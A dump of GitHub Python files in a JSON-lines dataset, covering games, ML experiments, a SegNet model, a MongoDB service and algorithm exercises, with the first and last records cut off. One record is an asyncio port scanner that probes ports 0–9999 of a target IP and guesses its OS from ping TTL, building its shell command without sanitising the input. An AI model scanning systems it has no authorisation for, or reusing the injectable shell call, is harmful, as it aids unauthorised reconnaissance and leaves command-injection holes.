letter):\r\n #print('\\n')\r\n return pos\r\n else:\r\n boardCopy[pos] = '_'\r\n\r\n # Center Filling\r\n if gboard[4] == '_':\r\n return 4\r\n\r\n if gboard[4] == 'O':\r\n # Edge Filling\r\n for i in [1, 3, 5, 7]:\r\n if gboard[i] == '_':\r\n return i\r\n # Corner Filling\r\n for i in [0, 2, 6, 8]:\r\n if gboard[i] == '_':\r\n return i\r\n\r\n elif gboard[4] == 'X':\r\n # Corner Filling\r\n for i in [0, 2, 6, 8]:\r\n if gboard[i] == '_':\r\n return i\r\n # Edge Filling\r\n for i in [1, 3, 5, 7]:\r\n if gboard[i] == '_':\r\n return i\r\n\r\n\r\ndef checkBoard(gboard, ch):\r\n if (gboard[0] == ch and gboard[1] == ch and gboard[2] == ch) \\\r\n or (gboard[3] == ch and gboard[4] == ch and gboard[5] == ch) \\\r\n or (gboard[6] == ch and gboard[7] == ch and gboard[8] == ch) \\\r\n or (gboard[0] == ch and gboard[3] == ch and gboard[6] == ch) \\\r\n or (gboard[1] == ch and gboard[4] == ch and gboard[7] == ch) \\\r\n or (gboard[2] == ch and gboard[5] == ch and gboard[8] == ch) \\\r\n or (gboard[0] == ch and gboard[4] == ch and gboard[8] == ch) \\\r\n or (gboard[2] == ch and gboard[4] == ch and gboard[6] == ch):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef main():\r\n while True:\r\n uval = user_input()\r\n board[uval] = 'X'\r\n show_board(board)\r\n if checkBoard(board, 'X'):\r\n print(\"You Won !!!\")\r\n break\r\n print(\"-/-\\-/-\\-/-\\- The CPU will play now -/-\\-/-\\-/-\\-\")\r\n cval = cpu_input(board)\r\n board[cval] = 'O'\r\n show_board(board)\r\n if checkBoard(board, 'O'):\r\n print(\"You Lost!\")\r\n break\r\n return\r\n\r\n\r\nprint(\"Let's Play Tic Tac Toe!!!\")\r\nprint(r\"Press 'Q' to quit\")\r\nglobal tricks\r\ntricks = True\r\nboard = ['_', '_', '_', '_', '_', '_', '_', '_', '_']\r\nshow_board(board)\r\nmain()\r\n","repo_name":"Onkar7798/Undefeated-TicTacToe","sub_path":"UndefeatedTicTacToe.py","file_name":"UndefeatedTicTacToe.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33863249201","text":"\nimport numpy\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom matplotlib import pyplot\n\nfrom machine_learning import MyKernelClassifier\nfrom machine_learning import LinearDiscriminant\nfrom machine_learning import generate_datasets\n\n# --------------------------------------------------------------------\ndef compute_hyperplane( X, Y ):\n m1 = numpy.mean( X[ Y==1 ], axis=0 )\n m2 = numpy.mean( X[ Y==0 ], axis=0 )\n\n # General equation\n A = - ( m1[1] - m2[1] )\n B = ( m1[0] - m2[0] )\n C = - A * m1[0] - B * m1[1]\n\n # Intermediate point\n ip = (m1+m2)/2.0\n\n return A, B, C, ip, m1, m2\n# --------------------------------------------------------------------\n\n# --------------------------------------------------------------------\ndef compute_hyperplane_fisher( X, Y ):\n \n # The mean vector of each class\n m1 = numpy.mean( X[ Y==1 ], axis=0 )\n m2 = numpy.mean( X[ Y==0 ], axis=0 )\n\n # Sw stores the variance whithin classes, it is accumulated for all classes\n Sw = numpy.zeros( X.shape[1] )\n for n in range(len(X)):\n if Y[n] == 1 :\n Sw = Sw + numpy.outer( (X[n] - m1 ), (X[n] - m1 ) )\n else: \n Sw = Sw + numpy.outer( (X[n] - m2 ), (X[n] - m2 ) )\n\n invSw = numpy.linalg.inv(Sw)\n w = numpy.dot( invSw, (m2-m1) )\n w = w / numpy.sqrt(numpy.dot(w,w))\n\n # General equation for 'w' as orthogonal to the hyperplane\n A = -w[1]\n B = w[0]\n C = - A * m1[0] - B * m1[1]\n\n # Intermediate point\n ip = (m1+m2)/2.0\n\n return A, B, C, ip, m1, m2\n# --------------------------------------------------------------------\n\n\nif __name__ == \"__main__\" :\n\n X_train,Y_train,X_test,Y_test = generate_datasets.generate_multivariate_normals( 2, 2, 150, 50, 5.0, 2.0 )\n\n pyplot.scatter( X_train[Y_train==1,0], X_train[Y_train==1,1], c='orange', s=50, edgecolors='none' )\n pyplot.scatter( X_train[Y_train==0,0], X_train[Y_train==0,1], c='cyan', s=50, edgecolors='none' )\n\n # fix the limits in order to show the data in isotropic axes\n xmin,xmax = pyplot.xlim()\n ymin,ymax = pyplot.ylim()\n xmin=ymin=min(xmin,ymin)\n xmax=ymax=max(xmax,ymax)\n pyplot.xlim( xmin, xmax )\n pyplot.ylim( ymin, ymax )\n\n colors=['red','green','blue','magenta','yellow']\n zx = numpy.linspace(xmin,xmax,1000)\n\n # SIMPLE HIPERPLANE\n A,B,C,ip,m1,m2 = compute_hyperplane( X_train, Y_train )\n # slope and intercept of the hyperplane that is orthogonal to 'w'\n slope = B/A\n intercept = ip[1] - slope*ip[0]\n # draw the hyperplane\n pyplot.plot( zx, slope*zx+intercept, color=colors[0], lw=3, ls='--' );\n\n # FISHER'S HIPERPLANE\n A,B,C,ip,m1,m2 = compute_hyperplane_fisher( X_train, Y_train )\n # slope and intercept of the hyperplane that is orthogonal to 'w'\n slope = B/A\n intercept = ip[1] - slope*ip[0]\n # draw the hyperplane\n pyplot.plot( zx, slope*zx+intercept, color=colors[2], lw=3, ls='--' );\n\n # draw the line from mean 1 to mean 2\n x0 = m1[0] ; y0 = m1[1]\n x1 = m2[0] ; y1 = m2[1]\n pyplot.plot( [x0,x1], [y0,y1], color=colors[3], lw=2 );\n\n # compute the unitary 'w' given the general equation of it as orthogonal to the hyperplane\n w=numpy.zeros( 2 )\n w[0] = -B\n w[1] = A\n w = w / numpy.sqrt(numpy.dot(w,w))\n \n # decides were to show 'w'\n x0 = 0.75*(xmax+xmin) ; y0 = slope * x0 + intercept\n if y0 > ymax or y0 < ymin :\n y0 = 0.75*(xmax+xmin)\n x0 = (y0 - intercept)/slope\n w = 0.25*(ymax-ymin)*w\n else:\n w = 0.25*(xmax-xmin)*w\n\n # draw the arrow for 'w'\n pyplot.annotate( 'w', xy=(x0,y0), xycoords='data', xytext=(x0+w[0],y0+w[1]), textcoords='data', arrowprops=dict(arrowstyle='<-') )\n\n pyplot.grid()\n pyplot.show()\n","repo_name":"ravalan/AprendizajeAutomatico","sub_path":"practicas_7_8/practica07/show-linear-discriminant.py","file_name":"show-linear-discriminant.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20603440376","text":"import os\nimport random\nimport time\nimport warnings\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn.functional as F\nfrom utils.util import *\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom sklearn.manifold import TSNE\n\ndef get_feats(loader, model):\n batch_time = AverageMeter('Time', ':6.3f')\n progress = ProgressMeter(\n len(loader),\n [batch_time],\n prefix='Test: ')\n\n # switch to evaluate mode\n model.eval()\n feats, labels, ptr = None, None, 0\n\n with torch.no_grad():\n end = time.time()\n for i, (images, target) in enumerate(loader):\n if i == 1000:\n break\n images = images.cuda(non_blocking=True)\n cur_targets = target.cpu()\n cur_feats = normalize(model(images)).cpu()\n B, D = cur_feats.shape\n inds = torch.arange(B) + ptr\n\n if not ptr:\n feats = torch.zeros((len(loader.dataset), D)).float()\n labels = torch.zeros(len(loader.dataset)).long()\n\n feats.index_copy_(0, inds, cur_feats)\n labels.index_copy_(0, inds, cur_targets)\n ptr += B\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print(progress.display(i))\n\n return feats, labels\n\ndef normalize(x):\n return x / x.norm(2, dim=1, keepdim=True)\n\ndef get_knn_dist(feats, batch_size, k):\n average = 0\n dist = torch.cdist(feats, feats, p=2)\n dist, nn_index = torch.topk(dist, k, dim=1, largest=False)\n mean_dist = torch.mean(dist, dim=1)\n average += torch.sum(mean_dist)\n return average / len(feats)\n # for i in range (0, len(feats), batch_size):\n # dist = torch.cdist(feats[i: i+batch_size], feats[i : i+batch_size], p=2)\n # dist, nn_index = torch.topk(dist, k, dim=1, largest=False)\n # mean_dist = torch.mean(dist, dim=1)\n # average += torch.sum(mean_dist) \n # return average / (len(feats) / batch_size)\n\ndef main():\n traindir = os.path.join('my_datasets/imagenet', 'train')\n valdir = os.path.join('my_datasets/imagenet', 'val')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])\n batch_size=100\n train_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(traindir, val_transform),\n batch_size=batch_size, shuffle=True,\n num_workers=16, pin_memory=True)\n\n model = models.__dict__['resnet50']()\n model.fc = nn.Sequential()\n\n wts_paths = ['output/checkpoints/cvil2/ckpt_epoch_10.pth', 'output/checkpoints/cvil2/ckpt_epoch_50.pth', \n 'output/checkpoints/cvil2/ckpt_epoch_100.pth', 'output/checkpoints/cvil2/ckpt_epoch_150.pth',\n 'output/checkpoints/cvil2/ckpt_epoch_200.pth'] \n # wts_path = 'output/checkpoints/cvil2/ckpt_epoch_200.pth'\n means = []\n for wts_path in wts_paths:\n wts = torch.load(wts_path)\n if 'state_dict' in wts:\n ckpt = wts['state_dict']\n elif 'model' in wts:\n ckpt = wts['model']\n else:\n ckpt = wts\n\n for p in model.parameters():\n p.requires_grad = False\n\n ckpt = {k.replace('module.', ''): v for k, v in ckpt.items()}\n ckpt = {k.replace('q_encoder.', ''): v for k, v in ckpt.items()}\n ckpt = {k.replace('t_encoder.', ''): v for k, v in ckpt.items()}\n state_dict = {}\n\n for m_key, m_val in model.state_dict().items():\n if m_key in ckpt:\n state_dict[m_key] = ckpt[m_key]\n else:\n state_dict[m_key] = m_val\n print('not copied => ' + m_key)\n\n model.load_state_dict(state_dict)\n # print(model)\n\n backbone = nn.DataParallel(model).cuda()\n backbone.eval()\n\n train_feats, _ = get_feats(train_loader, backbone)\n train_feats.to('cuda')\n average = get_knn_dist(train_feats, batch_size, k=10)\n means.append(average.item())\n print(average)\n plt.plot([10, 50, 100, 150, 200], means, label='mean', color='red', marker='o')\n plt.savefig(\"plot_checkpoint_.png\")\n\nif __name__ == '__main__':\n main()","repo_name":"fereshtehforghani/mean-shift-for-SSL","sub_path":"checkpoint_singleshot.py","file_name":"checkpoint_singleshot.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43241401683","text":"from typing import List\nfrom bson import ObjectId\nfrom api.schemas.receptionist import Receptionist\nfrom config.mongoCon import MongoCon\n\n\ndef get_all_receptionists(doctor_id: str = None, search: str = None) -> List[Receptionist]:\n find_condition = {\"role\": \"receptionist\"}\n if doctor_id:\n find_condition.update({\"doctors\": {\"$ne\": ObjectId(doctor_id)}})\n if search:\n find_condition.update({\n \"$or\": [\n {\"name\": {\"$regex\": search, \"$options\": \"i\"}},\n {\"lastname\": {\"$regex\": search, \"$options\": \"i\"}}\n ]\n })\n with MongoCon() as cnx:\n receptionists = list(cnx.users.find(find_condition, {\"password\": 0}))\n return receptionists\n\n\ndef get_dr_receptionists(doctor_id: str, search: str = None) -> List[Receptionist]:\n find_condition = {\"role\": \"receptionist\", \"doctors\": ObjectId(doctor_id)}\n if search:\n find_condition.update({\n \"$or\": [\n {\"name\": {\"$regex\": search, \"$options\": \"i\"}},\n {\"lastname\": {\"$regex\": search, \"$options\": \"i\"}}\n ]\n })\n with MongoCon() as cnx:\n receptionists = list(cnx.users.find(find_condition, {\"password\": 0}))\n return receptionists\n\n\ndef assign_doctor(receptionist_id: str, doctor_id: str) -> bool:\n with MongoCon() as cnx:\n result = cnx.users.update_one(\n {\"_id\": ObjectId(receptionist_id)},\n {\n \"$push\": {\"doctors\": ObjectId(doctor_id)}\n })\n return result.matched_count > 0\n\n\ndef unassign_doctor(receptionist_id: str, doctor_id: str) -> bool:\n with MongoCon() as cnx:\n receptionist = cnx.users.find_one(\n {\"_id\": ObjectId(receptionist_id)})\n if not receptionist:\n return False\n if len(receptionist[\"doctors\"]) > 1:\n result = cnx.users.update_one(\n {\"_id\": ObjectId(receptionist_id)},\n {\n \"$pull\": {\"doctors\": ObjectId(doctor_id)}\n })\n return result.modified_count > 0\n result = cnx.users.delete_one({\"_id\": ObjectId(receptionist_id)})\n return result.deleted_count > 0\n","repo_name":"leningael/medicapp-api","sub_path":"api/services/receptionist.py","file_name":"receptionist.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3126504993","text":"# -*- coding: utf-8 -*-\n# @File : top_k_frequent_elements.py\n# @Author: clelandgt@163.com\n# @Date : 2020-06-27\n# @Desc :\nfrom typing import List\n\n\nclass Solution1:\n \"\"\"\n 时间复杂度: O(n)\n 空间复杂度: O(n)\n \"\"\"\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n result = {}\n\n for num in nums:\n if result.get(num):\n result[num] += 1\n else:\n result[num] = 1\n\n return [item[0] for item in sorted(result.items(), key=lambda item: item[1], reverse=True)][:k]\n\n\ndef main():\n test_cases = [\n {'nums': [1, 1, 1, 2, 2, 4], 'k': 2},\n {'nums': [1], 'k': 1},\n ]\n\n print('***** Solution1 *****')\n s = Solution1()\n for test_case in test_cases:\n print(s.topKFrequent(test_case['nums'], test_case['k']))\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clelandgt/arithmetic","sub_path":"leetcode/347/top_k_frequent_elements.py","file_name":"top_k_frequent_elements.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70743271529","text":"'''\r\n数组中有一个数字出现的次数超过数组长度的一半,请找出这个数字。例如输入一个长度为9的数组{1,2,3,2,2,2,5,4,2}。\r\n由于数字2在数组中出现了5次,超过数组长度的一半,因此输出2。如果不存在则输出0。\r\n'''\r\n'''\r\n根据数组的特点,出现次数超过一半的数(众数),他出现的次数比其他数字出现的总和还要多,如果众数存在,\r\n则每次从数组中剪除和众数相同个数的元素,剩余数组的众数不变。因此可以设计一个计数器,初值为1,\r\n从第二个数起依次和“第一个”数比较,若相等则计数器加一,否则减一。当计数器变为零时,剪除前面部分。\r\n众数候选者改为新的当前元素,计数器重新更新为一,如此迭代直到最后。若最终计数器不为零,则众数存在,否则不存在。\r\n'''\r\n\r\n\r\nclass Solution:\r\n def majority_candidate(self, numbers):\r\n if not numbers:\r\n return 0\r\n\r\n # 初始众数候选设为首元素\r\n maj = numbers[0]\r\n # 初始计数器\r\n count = 1\r\n for i in range(1, len(numbers)):\r\n # 每当计数器归零,都意味着此时的前缀可以剪除\r\n if count == 0:\r\n # 众数候选者改为新的当前元素\r\n maj = numbers[i]\r\n # 计数器重置为1\r\n count = 1\r\n\r\n elif numbers[i] == maj:\r\n # 相应的更新差额计数器\r\n count += 1\r\n\r\n else:\r\n count -= 1\r\n # 若计数器为零,则不存在众数,返回0\r\n if not count:\r\n return 0\r\n\r\n # 至此,若原众数存在,则只能是maj,尽管反之不亦然\r\n return maj\r\n\r\n\r\nS = Solution()\r\nprint(S.majority_candidate([1, 2, 3, 2, 2, 2, 5, 4, 2]))\r\nprint(S.majority_candidate([1, 2, 3, 3, 3, 3, 4]))\r\nprint(S.majority_candidate([1, 2]))\r\nprint(S.majority_candidate([]))\r\n\r\n","repo_name":"iamTanTanTan/python_programming","sub_path":"028数组中出现次数超过一半的数字.py","file_name":"028数组中出现次数超过一半的数字.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71400238888","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\n\n\nclass SegnetDownConv(nn.Module):\n def __init__(self, in_channels, out_channels, num_layers):\n super(SegnetDownConv, self).__init__()\n self.conv = self.__make_layers(in_channels, out_channels, num_layers)\n\n def __make_layers(self, in_channels, out_channels, num_layers):\n layers = []\n layer_1 = nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n layers.append(layer_1)\n for i in range(0, num_layers - 1):\n layer_i = nn.Sequential(\n nn.Conv2d(in_channels=out_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n layers.append(layer_i)\n return nn.Sequential(*layers)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass SegnetUpConv(nn.Module):\n def __init__(self, in_channels, out_channels, num_layers):\n super(SegnetUpConv, self).__init__()\n self.conv = self.__make_layers(in_channels, out_channels, num_layers)\n\n def __make_layers(self, in_channels, out_channels, num_layers):\n layers = []\n for i in range(0, num_layers - 1):\n layer_i = nn.Sequential(\n nn.ConvTranspose2d(in_channels=in_channels, out_channels=in_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(in_channels),\n nn.ReLU()\n )\n layers.append(layer_i)\n layer_n = nn.Sequential(\n nn.ConvTranspose2d(in_channels=in_channels, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n layers.append(layer_n)\n return nn.Sequential(*layers)\n\n def forward(self, x):\n return self.conv(x)\n\n\nclass SegNet(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(SegNet, self).__init__()\n\n self.encoder_0 = SegnetDownConv(in_channels=in_channels, out_channels=64, num_layers=2)\n self.encoder_1 = SegnetDownConv(in_channels=64, out_channels=128, num_layers=2)\n self.encoder_2 = SegnetDownConv(in_channels=128, out_channels=256, num_layers=3)\n self.encoder_3 = SegnetDownConv(in_channels=256, out_channels=512, num_layers=3)\n self.encoder_4 = SegnetDownConv(in_channels=512, out_channels=512, num_layers=3)\n\n self.decoder_4 = SegnetUpConv(in_channels=512, out_channels=512, num_layers=3)\n self.decoder_3 = SegnetUpConv(in_channels=512, out_channels=256, num_layers=3)\n self.decoder_2 = SegnetUpConv(in_channels=256, out_channels=128, num_layers=3)\n self.decoder_1 = SegnetUpConv(in_channels=128, out_channels=64, num_layers=2)\n self.decoder_0 = SegnetUpConv(in_channels=64, out_channels=64, num_layers=1)\n self.final_layer = nn.ConvTranspose2d(in_channels=64, out_channels=out_channels, kernel_size=(3, 3), padding=(1, 1))\n\n self.max_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2), return_indices=True)\n\n def forward(self, x):\n dim_0 = x.size()\n x = self.encoder_0(x)\n x, i0 = self.max_pool(x)\n\n dim_1 = x.size()\n x = self.encoder_1(x)\n x, i1 = self.max_pool(x)\n\n dim_2 = x.size()\n x = self.encoder_2(x)\n x, i2 = self.max_pool(x)\n\n dim_3 = x.size()\n x = self.encoder_3(x)\n x, i3 = self.max_pool(x)\n\n dim_4 = x.size()\n x = self.encoder_4(x)\n x, i4 = self.max_pool(x)\n\n x = F.max_unpool2d(x, indices=i4, kernel_size=(2, 2), stride=(2, 2), output_size=dim_4)\n x = self.decoder_4(x)\n\n x = F.max_unpool2d(x, indices=i3, kernel_size=(2, 2), stride=(2, 2), output_size=dim_3)\n x = self.decoder_3(x)\n\n x = F.max_unpool2d(x, indices=i2, kernel_size=(2, 2), stride=(2, 2), output_size=dim_2)\n x = self.decoder_2(x)\n\n x = F.max_unpool2d(x, indices=i1, kernel_size=(2, 2), stride=(2, 2), output_size=dim_1)\n x = self.decoder_1(x)\n\n x = F.max_unpool2d(x, indices=i0, kernel_size=(2, 2), stride=(2, 2), output_size=dim_0)\n x = self.decoder_0(x)\n\n x = self.final_layer(x)\n return x\n\n\nif __name__ == '__main__':\n model = SegNet(1, 1)\n xx = torch.randn(1, 1, 256, 256)\n yy = model(xx)\n print(yy.shape)","repo_name":"istvan-stv-nagy/master_project","sub_path":"implementation/net/segnet.py","file_name":"segnet.py","file_ext":"py","file_size_in_byte":4526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69863811368","text":"from globals import *\nimport pygame as pg\n\n############ name constants #############\nWINDOW_TITLE = \"ETE - EarToEye\" \n\n############ path constants #############\nIMG_PATH = \"img/\"\nSOUND_PATH = \"track/\"\n\n############ display constants ##############\nNB_COLORS = 40\nMATRIX_FPS = 1\nCORREL_INTERVAL = 1\nCORREL_THRESHOLD = 0.01\n\n############ size constants #############\nBUTTON_SIZE = (SCREEN_WIDTH / 10, SCREEN_HEIGHT * 4 / 100)\nTRACK_INDENT = SCREEN_WIDTH * 3 / 100\nTRACK_WIDTH = SCREEN_WIDTH * 3 / 10\nTRACK_HEIGHT = 2 * (SCREEN_HEIGHT / 24)\nTRACK_SIZE = (TRACK_WIDTH, TRACK_HEIGHT)\nLINE_SHIFT = (SCREEN_WIDTH - TRACK_WIDTH) / 10\nLINE_OVERTRACK = TRACK_HEIGHT / 10\nLINE_OFFSET = SCREEN_WIDTH / 60\nTRACK_PIXPERSEC = SCREEN_WIDTH / 30\nPIECE_WIDTH = SCREEN_WIDTH / 2\n# MATRIX_POS = (TRACK_INDENT + TRACK_WIDTH, TRACK_INDENT)\n# MATRIX_SIZE = min(SCREEN_WIDTH - MATRIX_POS[0], SCREEN_HEIGHT - MATRIX_POS[1] - TRACK_INDENT)\nSHADE_HEIGHT = TRACK_INDENT / 2\nMATRIX_OFFSET = min(SCREEN_WIDTH, SCREEN_HEIGHT)/10\nMATRIX_SIZE = min(SCREEN_WIDTH - TRACK_WIDTH - SHADE_HEIGHT * 2, SCREEN_HEIGHT - TRACK_INDENT - SHADE_HEIGHT * 2)-MATRIX_OFFSET\n#MATRIX_SIZE = min(SCREEN_WIDTH - TRACK_WIDTH - SHADE_HEIGHT * 2, (SCREEN_HEIGHT- SHADE_HEIGHT-MATRIX_OFFSET)*NB_COLORS/(NB_COLORS + 2))\nMATRIX_POS = (SCREEN_WIDTH - MATRIX_SIZE, TRACK_INDENT + 2 * SHADE_HEIGHT)\n#MATRIX_POS = (SCREEN_WIDTH - MATRIX_SIZE, SCREEN_HEIGHT - MATRIX_S-MATRIX_OFFSET)\n\n############ limits and enumerations ###########\nPLAYER_STOPPED = 0\nPLAYER_PAUSED = 1\nPLAYER_PLAYED = 2\nVISU_NONE = 0 #no visualisation \nVISU_RTHM = 1 #rythmic visualisation\nVISU_MELO = 2 #melodic visualisation\nVISU_MULT = 3 #multi-track global rythm visualisation\n\n########### color constants ############\nBLACK = ( 0, 0, 0)\nWHITE = (255, 255, 255)\nDARKGRAY = ( 64, 64, 64)\nGRAY = (128, 128, 128)\nLIGHTGRAY = (212, 208, 200)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nMUTE_ON_COLOR = RED\nMUTE_OFF_COLOR = BLACK\n\n########### computing constants #########\nSAMPLE_RATE = 44100\nHOP_LENGTH = 1024\n\n\n","repo_name":"Jedyle/music-analysis","sub_path":"src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24470971667","text":"#!/usr/bin/python3\n\nimport socket, os, time, pyfiglet,sys,urllib,asyncio,re,subprocess\nfrom os import system\nfrom datetime import datetime\nfrom os import name, truncate\nfrom colorama import *\n\n###\n\n\n\n\n\n####HELP_Panel\n\nif len(sys.argv) !=2:\n print(\"\\n[i] Uso: python3 \" + \"sys.argv[0]\"+ \" \\n\" )\n sys.exit(1)\n###################################\n\nip_adress=sys.argv[1]\nport_list=[]\nopen_ports=[]\n\n\n##Saber sistema operativo\ndef get_ttl(ip):\n \n \n proc= subprocess.Popen([\"/usr/bin/ping -c 1 %s\" %ip_adress , \"\" ], stdout=subprocess.PIPE, shell=True)\n (out,err)=proc.communicate() \n \n out=out.split()\n\n out=out[12].decode('utf-8')\n \n ttl_value = re.findall(r\"\\d{1,3}\", out)[0]\n \n return ttl_value\n\ndef get_OS(ttl):\n \n ttl=int(ttl)\n if ttl >=0 and ttl <= 64:\n return \"LINUX\"\n elif ttl >= 65 and ttl <=128:\n return \"WINDOWS\"\n else:\n return \"Not Found\"\n \ndef what_OS():\n #ip_adress=sys.argv[1] \n ttl=get_ttl(ip_adress) \n os_name=get_OS(ttl)\n print(\"O.S -> |\",os_name,\"|\")\n###########################################################################################\n\nfor port in range(0,10000):\n port_list.append(port)\n \n\ndef banner():\n ascii_banner= pyfiglet.figlet_format('ScanPort')\n print (Fore.LIGHTCYAN_EX + ascii_banner)\n print(\" made by\" +Fore.LIGHTRED_EX +\" Sharker3312\")\n print(Fore.LIGHTCYAN_EX +\"-\" *50)\n print(\"Scanning Target: \" + ip_adress )\n print(\"Scanning Target at: \"+str(datetime.now()))\n print(\"-\"*50+ Fore.YELLOW)\n \n \ndef clear():\n if os.name ==\"nt\":\n os.system(\"cls\")\n else:\n os.system(\"clear\") \n\n\nasync def check_port(ip, port, loop):\n \n conn = asyncio.open_connection(ip_adress, port, loop=loop)\n try:\n reader, writer = await asyncio.wait_for(conn, timeout=3)\n open_ports.append(port)\n except:\n print(\"\",end=\"\\r\")\n finally:\n if 'writer' in locals():\n writer.close()\n \nasync def check_port_sem(sem, ip, port, loop):\n async with sem:\n return await check_port(ip, port, loop)\n \nasync def run(dests, ports, loop):\n \n sem = asyncio.Semaphore(1000) #Change this value for concurrency limitation \n tasks = [asyncio.ensure_future(check_port_sem(sem, d, p, loop)) for d in dests for p in ports]\n #for i in range(0,10000):\n # porc=float(i/10000)*100\n # porc=round(porc, 1)\n #print(porc,\"%\",end=\"\\r\")\n #time.sleep(0.005)\n \n responses = await asyncio.gather(*tasks)\n return responses\n\ndef menu():\n clear()\n banner()\n dests = [ip_adress] #destinations \n ports = port_list #ports \n loop = asyncio.get_event_loop()\n future = asyncio.ensure_future(run(dests, ports, loop))\n loop.run_until_complete(future)\n print(open_ports,\"-> OPEN\")\n what_OS()\n print(Fore.LIGHTCYAN_EX+'-'*50)\n\n \n\nif __name__=='__main__':\n \n menu()\n ","repo_name":"Sharker3312/ScanPort-Asynchronous","sub_path":"ascanport.py","file_name":"ascanport.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222156929","text":"class Solution:\n # @param prices, a list of integer\n # @return an integer\n def maxProfit(self, prices):\n n = len(prices)\n if n < 2:\n return 0\n \n sell = {}\n buy = {}\n res = 0\n \n prev_price = 1<<30\n for i in range(n):\n sell[i] = max(0, prices[i] - prev_price)\n prev_price = min(prev_price, prices[i])\n res = max(res, sell[i])\n \n aftr_price = -1<<30\n for i in range(n - 1, -1, -1):\n buy[i] = max(0, aftr_price - prices[i])\n aftr_price = max(aftr_price, prices[i])\n \n for i in range(1, n):\n sell[i] = max(sell[i], sell[i-1])\n \n for i in range(n - 2, -1, -1):\n buy[i] = max(buy[i], buy[i+1])\n \n for i in range(n - 1):\n res = max(res, sell[i] + buy[i+1])\n \n return res\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"123.py","file_name":"123.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31969957300","text":"import numpy as np\nimport pandas as pd\nimport helpers\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict, GridSearchCV\nfrom sklearn.metrics import precision_score, recall_score, f1_score, confusion_matrix, precision_recall_curve, roc_curve\n\n#load data\nX_raw_data = pd.read_csv('../data/multiclass/X.csv', header=None)\ny_raw_data = pd.read_csv('../data/multiclass/y.csv', header=None)\n\n#remove the training set\nX_training, X_testing, y_training, y_testing = train_test_split(X_raw_data, y_raw_data, test_size = 0.2, random_state = 78, stratify=y_raw_data)\n\n#sort the data\nX_training = X_training.sort_index()\ny_training = y_training.sort_index()\n\n#standardize the data\nX = StandardScaler().fit_transform(X_training)\n\n#Principal component analysis\npca = PCA(n_components=2)\ndata = pca.fit_transform(X)\n\nprincipalDf = pd.DataFrame(data = data, columns = ['principal component 1', 'principal component 2'])\n\n\nX1_y0 = principalDf.iloc[0:32,0]\nX2_y0 = principalDf.iloc[0:32,1]\nX1_y1 = principalDf.iloc[32:64,0]\nX2_y1 = principalDf.iloc[32:64,1]\nX1_y2 = principalDf.iloc[64:96,0]\nX2_y2 = principalDf.iloc[64:96,1]\nX1_y3 = principalDf.iloc[96:128,0]\nX2_y3 = principalDf.iloc[96:128,1]\nX1_y4 = principalDf.iloc[128:160,0]\nX2_y4 = principalDf.iloc[128:160,1]\n\nplt.scatter(X1_y0, X2_y0, color='orange') #air\nplt.scatter(X1_y1, X2_y1, color='blue') #book\nplt.scatter(X1_y2, X2_y2, color='green') #hand\nplt.scatter(X1_y3, X2_y3, color='purple') #knife\nplt.scatter(X1_y4, X2_y4, color='red') #plastic 